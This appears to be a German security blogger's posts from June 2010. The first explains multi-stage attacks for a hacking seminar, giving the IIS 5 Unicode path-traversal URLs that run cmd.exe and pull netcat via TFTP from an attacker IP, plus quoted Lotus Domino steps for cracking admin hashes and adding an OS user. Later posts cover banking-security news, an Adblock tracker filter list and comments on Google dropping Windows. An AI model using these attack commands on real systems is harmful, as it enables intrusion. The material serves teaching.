4. Juni 2010
Mehrstufige Angriffe sind nach meiner Definition Angriffe, die mit einer scheinbar kleinen Lücke beginnen, die dann aber über mehrere Einzelschritte zu einer völligen Kompromittierung eines Systems führen. In meinen Hacking-Seminaren verwende ich gerne ein Beispiel, das zwar steinalt ist, die Systematik eines Angriffs aber sehr schön vorführt: den IIS 5 Unicode Path Traversal Angriff.
Auf den ersten Blick sieht der Unicode Path Traversal harmlos aus. Man kann damit auf Dateien außerhalb des eigentlich freigegebenen Verzeichnisses zugreifen. Das sieht aus wie eine relativ harmlose Verletzung der Vertraulichkeit auf einem öffentlichen Webserver. Die Folgeschritte sehen dann so aus:
- Unicode Path Traversal erlaubt es auf Dateien außerhalb des Inetpub zuzugreifen.
- Das Scripts-Verzeichnis (und Unterverzeichnisse) enthält Dateien, die ausgeführt werden dürfen.
- Mit Hilfe des Scripts-Verzeichnisses und dem Path Traversal kann man die cmd.exe starten, wenn sich Inetpub und WINNT auf dem gleichen Laufwerk befinden. Die URL die ich verwende ist „http://[Server-IP]/scripts/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir“.
- Bequemerweise kopiert man sich die cmd.exe direkt in das Scripts-Verzeichnis.
- Über die cmd.exe kann man TFTP starten und beispielsweise Netcat herunterladen. Die URL die ich verwende ist „http://[Server-IP]/scripts/cmd.exe?/c+tftp+-i+[Angreifer-IP]+GET+nc.exe“.
- Netcat kann man wiederum über die cmd.exe als Server starten. Schon hat man einen interaktiven Zugang. Allerdings mit beschränkten Rechten.
- Mit dem IIS-Exploit der httpodbc.dll kann man LocalSystem-Rechte bekommen. Die httpodbc.dll lädt man beispielsweise via TFTP in das Scripts-Verzeichnis.
Im Ergebnis hat man dann den Rechner komplett übernommen. Natürlich gibt es den Unicodeloader, der diverse Schritte automatisch durchführt aber ich halte es für eine nette Übung, das schrittweise durchzuführen.
Für Lotus Notes gibt es jetzt eine ähnliche Anleitung: „Getting OS Access Using Lotus Domino Application Server“ (PDF) von DSecRG:
- Run raptor_dominohash script and collect all password hashes
./raptor_dominohash 192.168.0.202
- Save hashes in file using format described in the Stage 3.
- Run JohnTheRipper with hashes file generated at the previous step
./john HASH.txt –format=lotus5
- If you find administrator’s hash you can address to:
http://servername/webadmin.nsf
- In Quick Console run command that adds a new user to OS
load cmd /c net user dsecrG password /all
- For testing if this command successfully executed we run net user command and save the results to the file.
load cmd /c net user > C:\Lotus\Domino\data\domino\html\download\filesets\netuser1.png
- To view the results we open the following link:
http://servername/download/filesets/netuser1.png
Ok, für diesen Angriff braucht man ein erfolgreich gecracktes Admin-Login aber man kann das Verfahren leicht anpassen wenn man einen geeigneten Exploit für Lotus Domino hat. Mal sehen, vielleicht nehme ich das weiteres Beispiel für mehrstufige Angriffe in meinen Hacking-Workshop mit auf.
3. Juni 2010
Kommunikation mit der Bank wird immer gefährlicher. Weder Internetbanking noch Geldautomaten sind noch ausreichend sicher. Aber egal, das Risiko trägt ja bekanntlich der Kunde.
BSI-zertifizierter Kobil Kartenleser gehackt
Tja, si eine BSI-Zertifizierung ist auch nicht mehr das, was sie nie war. Der Kobil SecOVID Reader III, der vom BSI für den Einsatz nach dem strengen deutschen Signaturgesetz (SigG) zugelassen wurde, kann mit einer fremden nicht signierten Firmware geflasht werden. Und schon hat sich die Sicherheit erledigt. Und sehr schön, das Problem wurde nicht allgemein bekannt gemacht, weil es sich um „eine überschaubare Kundengruppe“ handeln soll und die die Anwendungen für Geldkarte, HBCI und Secoder nicht von der Lücke betroffen seien. Stimmt zwar nicht aber klingt besser und beruhigt die Homebanking-Kunden die ja für den Schaden haften, wenn was schiefgeht.
Mehr Geldautomaten werden manipuliert
Das Abheben von Geld am Geldautomat wird dafür auch immer unsicherer. Das BKA warnt mal wieder vor Skimming, d.h. manipulierten Geldautomaten um Kartendaten und PIN abzugreifen. „Als normaler Kunde kann man eine Manipulation im Grunde nicht erkennen“, sagte BKA-Präsident Jörg Ziercke. Und: „Viele Banken würden die Manipulationen nicht melden, weil sie sonst um ihre Reputation fürchteten“. Na toll. Aber laut AGB haftet eh der Kunde.
OCSP rettet uns auch nicht
Und für das gewöhnliche Internet-Banking gibt es auch beruhigende Nachrichten für den bösen Hacker. Das Online Certificate Status Protocol (OCSP), das vom Browser verwendet wird um die Gültigkeit von SSL-Zertifikaten zu verifizieren kann geschickt manipuliert werden. Dazu erklärt man dem Browser über eine OCSP-Statusmeldung einfach, der Server sei überlastet und der Browser solle es später nochmal probieren. Das Standardverhalten der Browser ist dann, das Zertifikat halt solange anzuerkennen.
Mobile Banking bedroht
Und für die Freunde von Mobile Banking oder Mobile TANs gibt es zum Schluß noch den Hinweis, dass zumindest im Android Market bereits eine Applikation aufgetaucht ist, die Bankzugangsdaten ausspähen sollte. Ich denke wir werden noch viel mehr in diese Richtung erleben.
Ich sollte mir mein Gehalt vielleicht wieder bar auszahlen lassen 🙂
2. Juni 2010
dem kann ich nichts hinzufügen.
Naja, hat sich ja hoffentlich erledigt.
Ich habe meine persönliche Filterliste im Adblock Plus mal überarbeitet und neu strukturiert. Ich bin sicher, man kann die Filter noch optimieren für meine Zwecke sind sie jedoch schnell und effizient genug.
Filterliste allgemeine Webbugs
Filterliste Google Analytics / Urchin
- .google-analytics.com/* (Google Analytics)
- */__utm.js (das Original Urchin Tracker Modul, Urchin 5)
- */__utm.gif?* (Urchin Tracker Modul ??)
- */urchin.js (das um Google Analytics erweiterte Modul, Urchin 6)
- */ga.js (das neue Google Analytics Javascript)
- */__ga.js (das neue Google Analytics Javascript)
- ||ajax.googleapis.com/ajax/libs/jquery/*
- ||ajax.googleapis.com/ajax/libs/jqueryui/*
Filterliste IVW / SZM
Filterliste Facebook / Like und andere Social Networks
- ||facebook.com/plugins/like.php
- ||facebook.com/plugins/likebox.php
- ||facebook.com/connect.php
- ||facebook.com/connect/connect.php
- ||facebook.com/widgets/recommendations.php
- ||static.ak.fbcdn.net/rsrc.php
- ||static.ak.fbcdn.net/connect.php
- ||badge.facebook.com/badge/
- ||api.tweetmeme.com/button.js
Filterliste Yahoo Web Analytics Tracking
Filterliste Flattr (vermutlich mache ich mich damit unbeliebt)
Spezialfilter für nervende Social Network Bookmark Links
- sueddeutsche.de##div[class^=“articlefooter“]
- sueddeutsche.de##div[id^=“bookmarking“]
- sueddeutsche.de##li[class^=“social“]
- welt.de##div[class^=“advertising“]
- welt.de##div[id^=“footerContainer“]
- welt.de##div[id^=“stickySocialBookmarks“]
- spiegel.de##div[id^=“spSocialBookmark“]
- 20min.ch##div[class^=“social_bookmarks“]
Anmerkung am Rande
Die einzige mir bekannte Webseite eines Medienunternehmens auf dem meine Filter nichts, aber auch gar nichts blockieren ist die Webseite des Titanic Magazins.
Nachtrag:
Und ja, ich habe ein (bezahltes) Titanic Abo. Das hat mir mein Bruder zu Weihnachten geschenkt 😉
Nachtrag 2:
Ich habe noch ein paar Facebook-Blockierregeln ergänzt. Das entwickelt sich echt zur Seuche. Ich denke ich werde die Liste mal komplett überarbeiten und optimieren müssen. Dann kann ich die auch als Import-Filter zur Verfügung stellen, wenn das jemand interessiert.
1. Juni 2010
Sehr schöne Beschreibung, was beim Betrieb eines komplexen Netzwerks alles schief gehen kann …
Und bestätigt meine alte These, dass neben der vorbeugenden Sicherheit längst auch ein Risikomanagement und geeignete Maßnahmen für einen Sicherheitsvorfall implementiert werden müssen.
Google trifft eine interessante und meiner Ansicht nach recht kurzsichtige Entscheidung, auf Windows im Firmennetz komplett verzichten zu wollen.
Alleine die Überlegung, statt Windows bevorzugt MacOS X mit dem ganz toll sicheren Safari Browser zu präferieren ist natürlich für jeden vom Fach sofort verständlich. Ich glaube es geht in der Thematik um zwei andere Punkte die für Google viel wichtiger sind:
1. Der symbolische Schuß gegen Microsoft. Natürlich spart Google ein paar Dollar für Windows-Lizenzen aber das ist kein Kriterium. Außerdem ist bekannt, dass MacOS X mindestens genauso viele Sicherheitslücken hat, die meisten die ich kenne halten MacOS X sicherheitstechnisch sogar für deutlich schlechter als Windows 7. Aber der Zeitpunkt ist gut gewählt um dem alten Gegner Microsoft, der Google in einigen Ländern mit Bing gerade Marktanteile abnimmt eins vor den Bug zu knallen.
2. Die Kontrolle und Überwachung der Mitarbeiter. Bei den E-Mails die in meinem privaten Outlook liegen habe ich weitgehende Kontrolle darüber. Sofern ich auf Software wie Google Desktop Search oder was es da aktuell gibt verzichten kann. Bei E-Mails, die in einem Google Mail Account liegen, bei Dokumenten die in Google Apps liegen, bei Nachrichten in Google Buzz habe ich die Kontrolle nicht mehr. Die hat Google.
Aber es klingt natürlich viel besser, wenn man die Änderung mit „Sicherheitsbedenken“ begründen kann.